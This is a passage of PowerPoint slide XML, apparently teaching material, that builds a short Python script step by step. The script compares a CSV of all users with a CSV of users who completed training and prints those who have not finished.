              <a:t>line[1] = user + “@enpm685.com”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="619304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10FF-9889-AB43-8C9C-E8923D6F573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0A9017D-843E-AB49-8FDE-91A8B66BF0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300"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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/python3</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b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import csv</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read in CSV of all users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># compare to list of completed users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># if user is not in completed output their information</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completed format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># 0 = name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># 1 = email</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all users format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># 0 = username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># 1 = first, 2 = last</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># 3 = title, 4 = phone, 5 = dept </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3982337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A8DF-625E-E546-966D-606D0980A3BD}"/>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1886444-2D93-7E49-BBD0-00025922503D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completedusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = []</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b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed.csv","r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed_reader</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csv.reader</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completed_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pP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0</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for row in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed_reader</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 Skip the header "Email"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	if row[1] != "Email":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# build the list but let's strip "@enpm685.com"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# this will return only the user name part of the email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		username = row[1].split("@")[0]</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completedusers.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(username)</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+ 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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73068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A8DF-625E-E546-966D-606D0980A3BD}"/>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51886444-2D93-7E49-BBD0-00025922503D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completedusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = []</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err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed.csv","r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed_reader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csv.reader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completed_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pP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0</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b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for row in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed_reader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"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 Skip the header "Email"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pP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if row[1] != "Email":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# build the list but let's strip "@enpm685.com"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# this will return only the user name part of the email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pP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username = row[1].split("@")[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pP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completedusers.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(username)</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 + 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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69462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06E4-893F-EA4C-92A8-49D08DB77E71}"/>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1A17E5CB-188F-174C-B048-E87868096D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38" y="126238"/>
            <a:ext cx="6759770" cy="3860546"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063FD550-3F40-9D41-BE73-E7C672DEB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176" y="4242976"/>
            <a:ext cx="3621024" cy="2252311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112450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2CCD-8C58-924E-88F1-E741012E0AEC}"/>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95E80A6-03FF-5644-A387-A34B025A80C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pP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 = 0</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err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allusers_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allusers.csv","r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allusers_reader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csv.reader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allusers_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</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print("\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nRemaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> users:")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print("----------------")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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17342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E3B1-C346-6C40-8655-8614924B64C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4A9B07A1-AD32-964C-9F61-FDAAFD2BE180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># skipping the CSV "header" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allusers_reader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</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for row in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allusers_reader</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if row[0] not in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completedusers</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 output user, email, name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		print(row[0] + "," + row[0] + "@enpm685.com," + row[1] + " " + row[2])</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 + 1</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str() to change our int to a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print("\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> completed training: " + str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completed_count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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print("Users still need to complete training: " + str(</a:t>
            </a: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71115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E3B1-C346-6C40-8655-8614924B64C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4A9B07A1-AD32-964C-9F61-FDAAFD2BE180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># skipping the CSV "header" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>next(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allusers_reader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</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b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for row in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allusers_reader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	if row[0] not in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>completedusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# output user, email, name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pP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print(row[0] + "," + row[0] + "@enpm685.com," + row[1] + " " + row[2])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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remaining_count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + 1</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 str() to change our int to a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print("\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
